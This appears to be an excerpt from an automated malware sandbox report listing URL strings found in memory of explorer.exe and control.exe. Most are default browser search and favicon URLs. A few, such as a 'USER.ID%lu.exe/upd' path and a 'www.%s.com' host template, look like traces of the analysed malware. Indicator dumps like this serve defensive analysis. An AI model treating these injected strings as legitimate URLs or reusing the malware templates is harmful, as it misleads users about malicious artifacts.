            Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000024.00000002.674152655.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000024.00000000.659633766.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
